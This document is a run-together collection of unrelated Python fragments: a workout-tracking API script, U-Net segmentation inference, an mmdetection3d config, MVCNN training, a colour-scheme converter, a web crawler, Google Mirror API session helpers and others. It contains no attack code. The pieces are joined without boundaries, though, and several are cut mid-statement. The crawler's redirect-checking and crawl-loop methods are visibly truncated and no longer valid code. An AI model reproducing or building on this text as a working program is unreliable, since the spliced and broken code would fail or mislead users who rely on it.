dt.datetime.now() user_input = input("What exercises have you done today? ") user_headers = { "query": user_input, "gender": GENDER, "weight_kg": WEIGHT, "height_cm": HEIGHT, "age": AGE } response = requests.post(url=ENDPOINT, json=user_headers, headers=nutri_headers) response_data = response.json() for workout in response_data["exercises"]: workout_data = { "workout": { "date": current_date.strftime('%d/%m/%Y'), "time": current_date.strftime('%H:%M:%S'), "exercise": workout["name"].title(), "duration": round(workout["duration_min"]), "calories" : round(workout["nf_calories"]) } } response_workout = requests.post(url=WORKOUT_ENDPOINT, json=workout_data, headers=workout_headers) print(response_workout.text)apps/agent/apps.py from django.apps import AppConfig class AgentConfig(AppConfig): name = 'agent' def ready(self): from agent import signals import os import numpy as np import matplotlib.pyplot as plt import cv2 import torch import torch.nn as nn import torchvision.models as models from model import Unet from utils.dataloader import read_data_path, MaskDataset from torch.utils.data import DataLoader from utils.config import Config from utils.loss import dice_score # Hyperparameter config = Config() TRAIN_TEST_SPLIT = config.TRAIN_TEST_SPLIT BATCH_SIZE_VALIDATION = config.BATCH_SIZE_VALIDATION BATCH_SIZE_TESTING = config.BATCH_SIZE_TESTING PRED_SAVE_DIR = config.PRED_SAVE_DIR os.makedirs(PRED_SAVE_DIR, exist_ok=True) INFERENCE_WEIGHT = config.INFERENCE_WEIGHT # Use torch cuda device = torch.device('cuda' if torch.cuda.is_available() else 'cpu') # Import Resnet-50 as base network, modify first layer model_ft = models.resnet50(pretrained=True) model_ft.conv1 = nn.Conv2d(1, 64, kernel_size=(3, 3), stride=(2, 2), padding=(3, 3), bias=False) # Add Residual layer in unet model = Unet(model_ft) model.to(device) if INFERENCE_WEIGHT: model.load_state_dict(torch.load(INFERENCE_WEIGHT)) # Read data path, make in dataloader """ read_data_path input: (float), the split of train and test return: (list, list, list), train & valid & test file path list list -> (img_path, mask_path) """ training_list, validation_list, testing_list = read_data_path(TRAIN_TEST_SPLIT) val_dataset = MaskDataset(validation_list) val_loader = DataLoader(val_dataset, batch_size=BATCH_SIZE_VALIDATION, shuffle=False, drop_last=True) # Erosion and Dilation def ero_and_dil(image): kernel = np.ones((3,3), np.uint8) erosion = cv2.erode(image.copy(), kernel, iterations = 1) kernel = np.ones((7,7), np.uint8) dilation = cv2.dilate(erosion.copy(), kernel, iterations = 1) return dilation dice_score_list = [] number = 0 with torch.no_grad(): for imgs, masks in val_loader: imgs_gpu = imgs.to(device) outputs = model(imgs_gpu) outputs = torch.round(outputs) * 255 masks = masks.to(device) # Dice score list dice_scores = dice_score(outputs, masks) dice_score_list.extend([dice_scores.item()]) for index in range(BATCH_SIZE_VALIDATION): img_origin = np.reshape(imgs_gpu[index].cpu().numpy(), (256, 256)) pred_img = np.reshape(outputs[index].cpu().numpy(), (256, 256)) mask_img = np.reshape(masks[index].cpu().numpy()*255, (256, 256)) number += 1 print(number) if np.all(mask_img==0): fig, (ax1, ax2, ax3) = plt.subplots( nrows=1, ncols=3 ) ax1.imshow(img_origin, cmap=plt.cm.bone) ax2.imshow(img_origin, cmap=plt.cm.bone) ax2.grid(False) mask_img = ((mask_img / 255.) - 1) * (-1) mask_img = np.concatenate([mask_img.reshape(256, 256, 1), np.ones([256, 256, 1]), mask_img.reshape(256, 256, 1)], axis=-1) mask_img = np.array(mask_img, np.float32) ax2.imshow(mask_img, alpha = 0.3) ax3.imshow(img_origin, cmap=plt.cm.bone) ax3.grid(False) ax3.imshow(mask_img, alpha = 0.3) pred_img_3 = ero_and_dil(pred_img) pred_img_3 = ((pred_img_3 / 255.) - 1) * (-1) pred_img_3 = np.concatenate([np.ones([256, 256, 1]),pred_img_3.reshape(256, 256, 1), np.ones([256, 256, 1])], axis=-1) pred_img_3 = np.array(pred_img_3, np.float32) ax3.imshow(pred_img_3, alpha = 0.3) fig.savefig('{}/{}.jpg'.format('./pred_normal_301_combine_1', number)) plt.close(fig) else: fig, (ax1, ax2, ax3) = plt.subplots( nrows=1, ncols=3 ) ax1.imshow(img_origin, cmap=plt.cm.bone) ax2.imshow(img_origin, cmap=plt.cm.bone) ax2.grid(False) mask_img = ((mask_img / 255.) - 1) * (-1) mask_img = np.concatenate([mask_img.reshape(256, 256, 1), np.ones([256, 256, 1]), mask_img.reshape(256, 256, 1)], axis=-1) mask_img = np.array(mask_img, np.float32) ax2.imshow(mask_img, alpha = 0.3) ax3.imshow(img_origin, cmap=plt.cm.bone) ax3.grid(False) ax3.imshow(mask_img, alpha = 0.3) pred_img_3 = ero_and_dil(pred_img) pred_img_3 = ((pred_img_3 / 255.) - 1) * (-1) pred_img_3 = np.concatenate([np.ones([256, 256, 1]),pred_img_3.reshape(256, 256, 1), np.ones([256, 256, 1])], axis=-1) pred_img_3 = np.array(pred_img_3, np.float32) ax3.imshow(pred_img_3, alpha = 0.3) fig.savefig('{}/{}.jpg'.format('./pred_abnormal_301_combine_1', number)) plt.close(fig) xiaobaishu0097/mmdetection3d _base_ = [ '../_base_/datasets/scannet-3d-18class.py', '../_base_/models/votenet.py', '../_base_/default_runtime.py' ] data = dict( samples_per_gpu=2, workers_per_gpu=2 ) model = dict( backbone=dict( _delete_=True, type='Pointformer', num_points=(2048, 1024, 512, 256), radius=(0.2, 0.4, 0.8, 1.2), num_samples=(64, 32, 16, 16), basic_channels=64, fp_channels=((256, 256), (256, 256)), num_heads=8, num_layers=2, ratios=(1, 1, 1, 1), use_decoder=(False, False, False, False), use_lin_enc=False, cloud_points=40000, global_drop=0.2, decoder_drop=0.0, prenorm=True, norm_cfg=dict(type='BN2d')), bbox_head=dict( num_classes=18, bbox_coder=dict( type='PartialBinBasedBBoxCoder', num_sizes=18, num_dir_bins=24, with_rot=False, mean_sizes=[[0.76966727, 0.8116021, 0.92573744], [1.876858, 1.8425595, 1.1931566], [0.61328, 0.6148609, 0.7182701], [1.3955007, 1.5121545, 0.83443564], [0.97949594, 1.0675149, 0.6329687], [0.531663, 0.5955577, 1.7500148], [0.9624706, 0.72462326, 1.1481868], [0.83221924, 1.0490936, 1.6875663], [0.21132214, 0.4206159, 0.5372846], [1.4440073, 1.8970833, 0.26985747], [1.0294262, 1.4040797, 0.87554324], [1.3766412, 0.65521795, 1.6813129], [0.6650819, 0.71111923, 1.298853], [0.41999173, 0.37906948, 1.7513971], [0.59359556, 0.5912492, 0.73919016], [0.50867593, 0.50656086, 0.30136237], [1.1511526, 1.0546296, 0.49706793], [0.47535285, 0.49249494, 0.5802117]] ), # keypoint_contrastive_loss=dict( # type='SupConLoss', # ) ) ) optimizer = dict(type='AdamW', lr=2e-3, weight_decay=1e-1) optimizer_config = dict(grad_clip=dict(max_norm=10, norm_type=2)) lr_config = dict(policy='step', warmup=None, step=[32, 40], gamma=0.3) total_epochs = 48 brain-bzh/SilentCities import os,sys,shutil basepath = sys.argv[1] folderlist = os.listdir(basepath) for folder in folderlist: filelist = os.listdir(os.path.join(basepath,folder)) if len(filelist)==0: print("folder {} is empty, removing".format(folder)) shutil.rmtree(os.path.join(basepath,folder))0 import torch import torch.nn as nn import torch.backends.cudnn as cudnn from torch.utils.data import DataLoader from torch.autograd import Variable import torchvision.transforms as transforms import argparse import numpy as np import time import os import matplotlib.pyplot as plt from models.resnet import * from models.mvcnn import * import util from logger import Logger from custom_dataset_our_case import MultiViewDataSet import globals def train_MVCNN(case_description): print("\nTrain MVCNN\n") MVCNN = 'mvcnn' RESNET = 'resnet' MODELS = [RESNET, MVCNN] DATA_PATH = globals.DATA_PATH DEPTH = None MODEL = MODELS[1] EPOCHS = 100 BATCH_SIZE = 10 LR = 0.0001 MOMENTUM = 0.9 LR_DECAY_FREQ = 30 LR_DECAY = 0.1 PRINT_FREQ = 10 RESUME = "" PRETRAINED = True REMOTE = globals.REMOTE case_description = case_description print('Loading data') transform = transforms.Compose([ transforms.CenterCrop(500), transforms.Resize(224), transforms.ToTensor(), ]) device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu") # Load dataset dset_train = MultiViewDataSet(DATA_PATH, 'train', transform=transform) train_loader = DataLoader(dset_train, batch_size=BATCH_SIZE, shuffle=True, num_workers=2) ## Got rid of this, not using validation here. # dset_val = MultiViewDataSet(DATA_PATH, 'test', transform=transform) # val_loader = DataLoader(dset_val, batch_size=BATCH_SIZE, shuffle=True, num_workers=2) classes = dset_train.classes print(len(classes), classes) if MODEL == RESNET: if DEPTH == 18: model = resnet18(pretrained=PRETRAINED, num_classes=len(classes)) elif DEPTH == 34: model = resnet34(pretrained=PRETRAINED, num_classes=len(classes)) elif DEPTH == 50: model = resnet50(pretrained=PRETRAINED, num_classes=len(classes)) elif DEPTH == 101: model = resnet101(pretrained=PRETRAINED, num_classes=len(classes)) elif DEPTH == 152: model = resnet152(pretrained=PRETRAINED, num_classes=len(classes)) else: raise Exception('Specify number of layers for resnet in command line. --resnet N') print('Using ' + MODEL + str(DEPTH)) else: # number of ModelNet40 needs to match loaded pre-trained model model = mvcnn(pretrained=PRETRAINED, num_classes=40) print('Using ' + MODEL) cudnn.benchmark = True print('Running on ' + str(device)) """ Load pre-trained model and freeze weights for training. This is done by setting param.requires_grad to False """ """Just added this check to load my pretrained model instead of copying it to the repo and having a duplicate""" if REMOTE: PATH = "../../MVCNN_Peter/checkpoint/mvcnn18_checkpoint.pth.tar" else: PATH = "checkpoint/model_from_pete.tar" loaded_model = torch.load(PATH) model.load_state_dict(loaded_model['state_dict']) for param in model.parameters(): param.requires_grad = False num_ftrs = model.classifier[6].in_features model.classifier[6] = nn.Linear(num_ftrs, len(classes)) model.to(device) print(model) logger = Logger('logs') # Loss and Optimizer lr = LR n_epochs = EPOCHS criterion = nn.CrossEntropyLoss() optimizer = torch.optim.Adam(model.parameters(), lr=lr) best_acc = 0.0 start_epoch = 0 # Helper functions def load_checkpoint(): global best_acc, start_epoch # Load checkpoint. print('\n==> Loading checkpoint..') assert os.path.isfile(RESUME), 'Error: no checkpoint file found!' checkpoint = torch.load(RESUME) best_acc = checkpoint['best_acc'] start_epoch = checkpoint['epoch'] model.load_state_dict(checkpoint['state_dict']) optimizer.load_state_dict(checkpoint['optimizer']) def train(): train_size = len(train_loader) loss = None total = 0 correct = 0 for i, (inputs, targets) in enumerate(train_loader): # Convert from list of 3D to 4D inputs = np.stack(inputs, axis=1) inputs = torch.from_numpy(inputs) inputs, targets = inputs.cuda(device), targets.cuda(device) inputs, targets = Variable(inputs), Variable(targets) # compute output outputs = model(inputs) loss = criterion(outputs, targets) _, predicted = torch.max(outputs.data, 1) total += targets.size(0) correct += (predicted.cpu() == targets.cpu()).sum().item() """ print("total: ", total) print("correct: ", correct) print() """ # compute gradient and do SGD step optimizer.zero_grad() loss.backward() optimizer.step() if (i + 1) % PRINT_FREQ == 0: print("\tIter [%d/%d] Loss: %.4f" % (i + 1, train_size, loss.item())) return loss, int(float(float(correct)/float(total))*100) # Training / Eval loop if RESUME: load_checkpoint() best_acc = 0 best_loss = 0 loss_values = [] acc_values = [] for epoch in range(start_epoch, n_epochs): print('\n-----------------------------------') print('Epoch: [%d/%d]' % (epoch+1, n_epochs)) start = time.time() model.train() (t_loss, t_acc) = train() loss_values.append(t_loss) acc_values.append(t_acc) print("Total loss: " + str(t_loss)) print("Accuracy: " + str(t_acc) + "%") print('Time taken: %.2f sec.' % (time.time() - start)) if t_acc > best_acc: print("UPDATE") print("UPDATE") print("UPDATE") print("UPDATE") print("UPDATE") best_acc = t_acc best_loss = t_loss util.save_checkpoint({ 'epoch': epoch + 1, 'state_dict': model.state_dict(), 'loss_per_epoch': loss_values, 'acc_per_epoch': acc_values, 'optimizer': optimizer.state_dict(), }, MODEL, DEPTH, case_description) # Decaying Learning Rate if (epoch + 1) % LR_DECAY_FREQ == 0: lr *= LR_DECAY optimizer = torch.optim.Adam(model.parameters(), lr=lr) print('Learning rate:', lr) fig, axs = plt.subplots(2) fig.suptitle('Vertically stacked subplots') axs[0].plot(loss_values, 'r') axs[1].plot(acc_values, 'b') if not REMOTE: plt.show() else: plt.savefig("plots/training.png") renqiukai/cd_api ''' @说明 :草动开放平台基础方法 @时间 :2020/2/13 下午4:28:26 @作者 :任秋锴 @版本 :1.0 ''' import requests from loguru import logger import time class base: def __init__(self, token): self.token = token self.time = str(int(time.time())) def request(self, method="GET", **kwargs): api_address = f"https://api.wowkai.cn/adapter" headers = { "Authorization": f"Bearer {self.token}", } kwargs["headers"] = headers response = requests.request(method=method, url=api_address, **kwargs) # logger.debug(response.json()) if response.status_code == 200: return self.response(response.json()) def response(self, response_json): status_code = response_json.get("status_code") if status_code == 200: return response_json.get("data") else: logger.error(response_json) # -*- coding=utf-8 -*- #!/usr/bin/env python3 import os import plistlib from argparse import ArgumentParser __author__ = 'mgallet' RED = 'Red Component' GREEN = 'Green Component' BLUE = 'Blue Component' BACKGROUND = 'Background Color' CURSOR = 'Cursor Color' FOREGROUND = 'Foreground Color' def iterm2tilda_component(x): return str(int((x * 256)) + int((x * 256)) * 256) def main(): parser = ArgumentParser() parser.add_argument('input', help='.itermcolors filename') parser.add_argument('--input-tilda', default=None, help='Input tilda config file (e.g. ~/.config/tilda/config_0)') parser.add_argument('--output-tilda', default=None, help='Output tilda config file (e.g. ~/.config/tilda/config_0)') args = parser.parse_args() palette = [] with open(args.input, 'rb') as fd: content = plistlib.load(fd) new_values = {} for color_index in range(16): key = 'Ansi %d Color' % color_index palette += [iterm2tilda_component(content[key][RED]), iterm2tilda_component(content[key][GREEN]), iterm2tilda_component(content[key][BLUE])] new_values['palette'] = '{%s}' % ', '.join(palette) new_values['cursor_red'] = iterm2tilda_component(content[CURSOR][RED]) new_values['cursor_green'] = iterm2tilda_component(content[CURSOR][GREEN]) new_values['cursor_blue'] = iterm2tilda_component(content[CURSOR][BLUE]) new_values['back_red'] = iterm2tilda_component(content[BACKGROUND][RED]) new_values['back_green'] = iterm2tilda_component(content[BACKGROUND][GREEN]) new_values['back_blue'] = iterm2tilda_component(content[BACKGROUND][BLUE]) new_values['text_red'] = iterm2tilda_component(content[FOREGROUND][RED]) new_values['text_green'] = iterm2tilda_component(content[FOREGROUND][GREEN]) new_values['text_blue'] = iterm2tilda_component(content[FOREGROUND][BLUE]) new_content = '' input_tilda = args.input_tilda if input_tilda: input_tilda = os.path.expanduser(input_tilda) for line in open(input_tilda, 'r', encoding='utf-8'): key, sep, value = line.partition(' = ') if sep == ' = ' and key in new_values: new_content += '%s = %s\n' % (key, new_values[key]) else: new_content += line else: for key in sorted(new_values): new_content += '%s = %s\n' % (key, new_values[key]) output_tilda = args.output_tilda if output_tilda: output_tilda = os.path.expanduser(output_tilda) with open(output_tilda, 'w', encoding='utf-8') as fd: fd.write(new_content) else: print(new_content) if __name__ == '__main__': main() from ScanResult import * from TokenFileWorker import * from AlgorithmScan import * from PIL import Image import profile # Имя файла с изображением бланка. #--------------------------------------------------- SOURCE_IMAGE = "001_2.jpg" #--------------------------------------------------- tokenFileWorker = TokenFileWorker() # возвращает доступный idToken def generateIdToken(): scanResult = ScanResult() scanResult.setStatus( BEFORE_SCAN ) return tokenFileWorker.addScanResult( scanResult ) # начинаем работу алгоритма распознавания. # # image - исходное изображение(формат - PIL). # idToken - , по которому будет идентифицироваться # результат распознавания. def startScanForm( image,\ idToken ): # получаем результат распознавания. scanResult = startScan( image, idToken ) #заносим результат в TokeData( файл с результатами распознавания ). status = scanResult.getStatus() # Если все ок - пишем результат ЦЕЛИКОМ. if ( status == SUCCESS ): tokenFileWorker.setScanResult( scanResult ) else: # В противном случае, правим статус. tokenFileWorker.setScanStatus( idToken, status ) # получаем статус распознавания по маркеру. def getStatus( idToken ): scanResult = tokenFileWorker.getScanResult( idToken ) return scanResult.getStatus() #ПРИМЕР ИСПОЛЬЗОВАНИЯ #image = Image.open( SOURCE_IMAGE ) #idToken = generateIdToken() #startScanForm( image,\ # idToken ) #profile.run('startScanForm( image,\ # idToken )') #print( getStatus( idToken ) ) 0 import logging import time import re import urllib.parse from queue import Empty from multiprocessing import Process, Event from queue import Queue as Queue from multiprocessing import Queue as MPQueue from threading import Thread from enum import Enum # Used to enable launch as a main import os.path, sys sys.path.insert(0, os.path.abspath('.')) from webmining.html5wrapper import HTML5Wrapper from webmining.seed import Seed, SeedElement from webmining.fetcher import Fetcher, Timeout from webmining.website import Website from webmining.meta_extractor import MetaExtractor, MetaExtractionException from webmining import LIB_PATH __author__ = "" __email__ = "" __status__ = "dev" PAGE_SIZE_LIMIT = 300000 class CrawlMode(Enum): #crawling an entire domain entire = "entire" #crawling a subdomain subpath = "subpath" #crawling a single page single = "single" class Crawler: """ A generic crawler. """ def __init__(self, filename=None, seedlist=None, debug=False, proxy=None, multiproc=True, mode=CrawlMode.entire, max_page_size=PAGE_SIZE_LIMIT): """ :param filename: path to the seed file :param mode: crawling mode, either "entire", "single", "subpath" """ self.seed = None self.debug = debug # init the fetcher with a download limit size self.fetcher = Fetcher(proxy, max_page_size=max_page_size) self.htmltools = HTML5Wrapper() self.crawl_depth = 0 # Do we crawl domains outside the seed self.domain_depth = 0 # At which depth each seed element must be crawled self.page_limit = 0 # Max amount of pages to be crawled self.max_page_size = max_page_size self.website = Website() self.me = MetaExtractor(proxy=proxy) self.badextensions = set(["pdf", "xls", "doc", "ppt", "rtf", "odt", "zip", "tar.gz", "tar", "exe", \ "jpg", "png", "jpeg", "bmp", "gif", "mp3", "flv", "rar", "ogv", "avi", "mp4", \ "mkg", "ps", "ogg", "webm", "ogm", "pps", "pptx", "docx", "xlsx", "mpg", "mov", \ "mkv", "mpeg", "m4v", "iso"]) self.crawling_process_over = False # Logging initialization self.logger = logging.getLogger("webmining:crawler") self.logger.setLevel(logging.INFO) if debug: self.logger.setLevel(logging.DEBUG) self.filename = filename self.seedlist = seedlist self.mode = mode self.authorized_domains = set() def _monitore_processes(self, processes): """ Checks if subcrawling processes are over. This method is meant to be used wrapped into a Thread. """ for p in processes: p["event"].wait() self.crawling_process_over = True def spawn_crawl_processes(self, html2txt, metas, proc, wait_courtesy): processes = [] for i in range(0, proc): e = Event() p = Process(None, self._sub_crawl, None, (), {"queue": self.seed.q, "storage": self.storage, "end_event": e, \ "wait": wait_courtesy, "html2txt": html2txt, "metas": metas}) p.start() processes.append({"proc": p, "event": e, "id": i}) monitor = Thread(group=None, target=self._monitore_processes, name=None, args=(), kwargs={"processes": processes}) monitor.start() while not self.crawling_process_over: # If all processes are over, or if getting an element # from queue takes more than timeout seconds (which seems empirically abnormal) # then crawl is finished. c = 0 for p in processes: if not p["proc"].is_alive(): c += 1 if c >= len(processes): self.logger.warning("All processes are dead !") break try: el = self.storage.get(block=True, timeout=5) yield el except Empty: if self.storage.empty(): pass self.logger.debug("joining processes...") for p in processes: if p["proc"].is_alive(): p["proc"].terminate() p["proc"].join() # Finally, joining monitoring thread monitor.join(3) if monitor.is_alive(): monitor._stop() def crawl(self, proc=None, domain_depth=0, crawl_depth=0, page_limit=None, wait_courtesy=0, html2txt=False, metas=None): """ :param proc: amount of processes to spawn, 0 or None can be used to exploit the current process :param domain_depth: crawling depth for each seed element (inside original domain) :param crawl_depth: crawling depth for each seed element (outside original domain) :param page_limit: max amount of page to crawl :param wait_courtesy: time in second between each fetch :param html2txt: resulting pages must be raw html (default), or cleant txt :param metas: metas we want to extract during crawling """ self.domain_depth = domain_depth self.crawl_depth = crawl_depth self.page_limit = page_limit # lazy loading, to know if we need to implement seeds with multiproc or not if self.seed is None: if self.filename is not None: self.seed = Seed(f=self.filename, multiproc=not (proc is None or proc == 0)) elif self.seedlist is not None: self.seed = Seed(s=self.seedlist, multiproc=not (proc is None or proc == 0)) if proc is None or proc == 0: self.storage = Queue() # Will contain shared crawl results self._sub_crawl(self.seed.q, self.storage, Event(), wait_courtesy, html2txt, metas, None) while True: try: el = self.storage.get(block=False) yield el except Empty: break else: self.storage = MPQueue() # Will contain shared crawl results yield from self.spawn_crawl_processes(html2txt, metas, proc, wait_courtesy) def _sub_crawl(self, queue, storage, end_event, wait, html2txt, metas, block_timeout=5): """ This private method will be wrapped into a process, and is in charge of dequeuing seed elements, and recording results into the storage. """ while True: se = None pages = [] try: se = queue.get(block=block_timeout is not None, timeout=block_timeout) except Empty: end_event.set() return self.logger.info("Launched crawl [%s]" % se.url) start_url = se.url # Need to keep it as it may change due to redirect pages = self.crawl_domain(se, self.domain_depth, wait, html2txt, self.page_limit, self.mode) self.logger.info("Crawl over with %d pages [%s]" % (len(pages), (se.url if start_url in se.url else '%s -> %s' % (start_url, se.url)))) first = True for url in pages: se = pages[url] ext_metas = {} # Extract asked metas from page if metas is not None: try: ext_metas = self.me.extract(metas, se.html, se.relevant_txt, \ url=url, firstpage=first) first = False except MetaExtractionException as e: self.logger.warning("Impossible to extract metas in [%s]: " % url) self.logger.warning(e) continue for m in ext_metas: if ext_metas[m] is not None: if m not in se.metas.keys(): if m in ["contact", "phone", "fax"]: se.metas[m] = [] else: se.metas[m] = set() if m in ["contact", "phone", "fax"]: se.metas[m].extend(ext_metas[m]) else: se.metas[m].add(ext_metas[m]) storage.put(se) # Let's save memory del pages if self.crawl_depth > 0: # TODO: create new seed elements to put in queue when crawl deeper than 0 # with an updated depth, domain, etc... raise Exception("Not implemented") def _check_first_page(self, dom, url): """ Checks if domain first page is - a html redirection - a frameset returns an url to follow, or None if nothing detected. """ # we check out if it contains a metas = dom("meta[http-equiv='refresh'][content], meta[http-equiv='Refresh'][content], meta[http-equiv='REFRESH'][content]") #raise Exception("type of metas : " + str(type(metas)) + "\n" + str(dir(metas))) base_url = self._get_base_url(dom, url) for m in metas.items(): content = m.attr.content m = re.search("url\s?=\s?(.*?)\s", content + ' ', flags=re.I) if m is not None: rurl = m.group(1).strip() rurl = urllib.parse.urljoin(base_url, rurl) self.logger.info("HTTP redirection to [%s]" % rurl) return rurl # We check out if it contains a self.max_page_size: self.logger.warning("Page ignored, too big (%d characters) in %s" % (len(html), seed_el.url)) return None # Is an attachment, so we must ignore it if fresult.attachment is not None: self.logger.warning( "Page ignored, because it correspond to the attachment %s [%s]" % (fresult.attachment, seed_el.url)) return None if len(html) == 0: self.logger.warning("Page ignored because it is empty [%s]" % seed_el.url) return None try: dom = self.htmltools.pq(html) except Exception as e: self.logger.warning("Impossible to parse html url=%s : %s" % (fresult.fetched_url, str(e))) return None # DEACTIVATED FEATURE # Test to see if the root node is a html node # if dom[0].tag.lower() != 'html': # self.logger.warning("Page is not a valid html [%s]" % seed_el.url) # return None return dom @staticmethod def _generate_authorized_domains(domain): domain = domain.lower() # Force lower case auth = set([domain]) if "www." in domain: auth.add(domain.replace("www.", "")) else: auth.add("www." + domain) comdom = {dom.rsplit(".", maxsplit=1)[0] + ".com" for dom in auth if ".com" not in dom} auth.update(comdom) return auth def _is_authorized_subpath(self, init_url, target_url): # Force Lower case init_url = init_url.lower() if init_url is not None else init_url target_url = target_url.lower() if target_url is not None else target_url init_path = urllib.parse.urlparse(init_url).path target_url_parsed = urllib.parse.urlparse(target_url) target_domain, target_path = target_url_parsed.netloc, target_url_parsed.path if target_domain in self.authorized_domains and target_path.startswith(init_path): return True return False def crawl_domain(self, init_seed_el, max_dom_depth, wait, html2txt, limit=None, mode=CrawlMode.entire): """ Fetches a domain, and then crawls its internal pages until given depth. Returns a dictionary of url -> html code. """ pages = {} visited = set() # Already visited URLs found_links = [init_seed_el] # List of found links as SeedElements, waiting to be fetched #overides the limit to crawl only one page if mode == CrawlMode.single: limit = 1 max_dom_depth = 1 self.logger.info("Launching crawl in the %s mode" % mode.value) # -- Managing authorized domains for this crawl -- domain = urllib.parse.urlparse(init_seed_el.url).netloc self.authorized_domains = self._generate_authorized_domains(domain) self.logger.info("Authorized domains for this crawl : %s" % str(self.authorized_domains)) # Looping through found urls while True: if limit is not None and len(visited) > limit: self.logger.info("Max amount of pages reached ! (%d)" % limit) return pages self.logger.debug("%d url visited so far" % len(visited)) seed_el = None # Current element being computed, in while loop try: while True: seed_el = found_links.pop(0) if seed_el.url not in visited: break visited.add(seed_el.url) # A popped element is considered visited except IndexError: self.logger.info("No more links to visit for this website.") return pages # Fetching URL given in seed element in param self.logger.debug("Fetching " + seed_el.url) fresult = None retry = 0 max_retry = 2 # TODO - VYS - Make this configurable while fresult is None and retry <= max_retry: try: fresult = self.fetcher.fetch(seed_el.url, self.debug, timeout=10) # If we're here it means that no more retry are needed, disable it retry = max_retry + 1 except Timeout: self.logger.warning("Timeout while fetching %s%s" % ( seed_el.url, (", lets retry (max retry %s)" % max_retry) if retry == 0 else ( " - retry %s/%s" % (retry, max_retry)))) retry += 1 continue if fresult is None: continue if wait > 0: time.sleep(wait) # Lets do a quick check if we don't get a redirect rurl30X = None if fresult.fetched_url != seed_el.url: rurl30X = fresult.fetched_url self.logger.warning("Got a redirect to %s when fetching %s" % (fresult.fetched_url, seed_el.url)) dom = self._verify_and_parse_result(fresult, seed_el) if dom is None: self.logger.warning("Found no DOM for %s" % seed_el.url) continue # normalize root urls to avoid a double visit at http://www.example.com/ and http://www.example.com path = urllib.parse.urlparse(seed_el.url).path if path == '': seed_el.url += '/' self.logger.debug("Fetched [%s] " % seed_el.url) # If this page is the first one for this domain, # we check out if it contains a max_dom_depth: continue if mode != CrawlMode.single: found_links.extend(self._extract_links(dom, init_seed_el, seed_el, visited, mode)) self.logger.debug("Out of while loop.") return pages def _get_base_url(self, dom, url): # check if there is a 'base' tag for link compute base_url = dom('base').attr('href') if base_url is None: base_url = url return base_url def _extract_links(self, dom, init_seed_el, seed_el, visited, mode): """ Given a dom, extract internal links to crawl """ # --- # Link extraction and checking # --- links = {} selected_links = [] added = set() # DOM is sometimes to deep to extract links properly try: links = self.htmltools.extract_doc_links(dom) except Exception as e: links = {} self.logger.warning("Impossible to extract links from %s : %s" % (seed_el.url, str(e))) base_url = self._get_base_url(dom, seed_el.url) for key in links: # We do not want anchors to be crawled key = key.split("#")[0] if len(key) < 1: continue url = None try: url = urllib.parse.urljoin(base_url, key) except Exception as e: # Invalid url, ignoring self.logger.warning("Invalid urljoin (%s,%s): %s" % (base_url, key, str(e))) continue # Trying to get eventual file extension, and to check its validity path = urllib.parse.urlparse(url).path if path == '': url += '/' else: ext = path.split('.')[-1].strip().lower() if ext in self.badextensions: self.logger.debug("Bad extension [%s] in %s" % (ext, url)) continue # Let's check if it's an internal link, and not an outgoing one if urllib.parse.urlparse(url).netloc.lower() in self.authorized_domains and \ url not in visited and url not in added: if mode == CrawlMode.subpath and not self._is_authorized_subpath(init_seed_el.url, url): continue se = SeedElement(url, seed_el.groupid) se.depth = seed_el.depth + 1 selected_links.append(se) added.add(url) return selected_links # for testing purpose if __name__ == "__main__": logging.basicConfig(level=logging.WARNING, format='[%(levelname)s][%(name)s][%(asctime)s] %(message)s') # def crawl(self, storage, proc=1, domain_depth=0, crawl_depth=0): c = Crawler(LIB_PATH + "resources/testseed.txt") count = 0 # def crawl(self, proc=1, domain_depth=0, crawl_depth=0, page_limit=None, wait_courtesy=0, html2txt=False, metas=None): for se in c.crawl(proc=2, domain_depth=2, crawl_depth=0, page_limit=80, wait_courtesy=0.1): # print(se) count += 1 print("%d elements have been crawled !" % count) # Copyright (C) 2013 Google Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """Utility functions for the Quickstart.""" __author__ = ' ()' from urlparse import urlparse import httplib2 from apiclient.discovery import build from oauth2client.appengine import StorageByKeyName from oauth2client.client import AccessTokenRefreshError import sessions from model import Credentials # Load the secret that is used for client side sessions # Create one of these for yourself with, for example: # python -c "import os; print os.urandom(64)" > session.secret SESSION_SECRET = open('session.secret').read() def get_full_url(request_handler, path): """Return the full url from the provided request handler and path.""" pr = urlparse(request_handler.request.url) return '%s://%s%s' % (pr.scheme, pr.netloc, path) def load_session_credentials(request_handler): """Load credentials from the current session.""" session = sessions.LilCookies(request_handler, SESSION_SECRET) userid = session.get_secure_cookie(name='userid') if userid: return userid, StorageByKeyName(Credentials, userid, 'credentials').get() else: return None, None def store_userid(request_handler, userid): """Store current user's ID in session.""" session = sessions.LilCookies(request_handler, SESSION_SECRET) session.set_secure_cookie(name='userid', value=userid) def create_service(service, version, creds=None): """Create a Google API service. Load an API service from a discovery document and authorize it with the provided credentials. Args: service: Service name (e.g 'mirror', 'oauth2'). version: Service version (e.g 'v1'). creds: Credentials used to authorize service. Returns: Authorized Google API service. """ # Instantiate an Http instance http = httplib2.Http() if creds: # Authorize the Http instance with the passed credentials creds.authorize(http) return build(service, version, http=http) def auth_required(handler_method): """A decorator to require that the user has authorized the Glassware.""" def check_auth(self, *args): self.userid, self.credentials = load_session_credentials(self) self.mirror_service = create_service('mirror', 'v1', self.credentials) # TODO: Also check that credentials are still valid. if self.credentials: try: self.credentials.refresh(httplib2.Http()) return handler_method(self, *args) except AccessTokenRefreshError: # Access has been revoked. store_userid(self, '') credentials_entity = Credentials.get_by_key_name(self.userid) if credentials_entity: credentials_entity.delete() self.redirect('/auth') return check_auth tests/env_api/test_google_football.py import numpy as np import pytest from malib.envs.gr_football import BaseGFootBall from malib.envs.gr_football.env import ParameterSharing from malib.envs.gr_football.wrappers import GroupedGFBall from malib.utils.episode import EpisodeKey @pytest.mark.parametrize( "env_name,n_player_left,n_player_right,use_built_in_GK, action_set", [ ("5_vs_5", 4, 0, True, "default"), ("5_vs_5", 5, 5, True, "v2"), # 5v5 failed ("5_vs_5", 5, 0, True, "v2"), ("5_vs_5", 4, 0, False, "default"), ("5_vs_5", 5, 5, False, "v2"), # 5v5 failed ("5_vs_5", 5, 0, False, "v2"), ], scope="class", ) class TestGoogleFootballEnv: 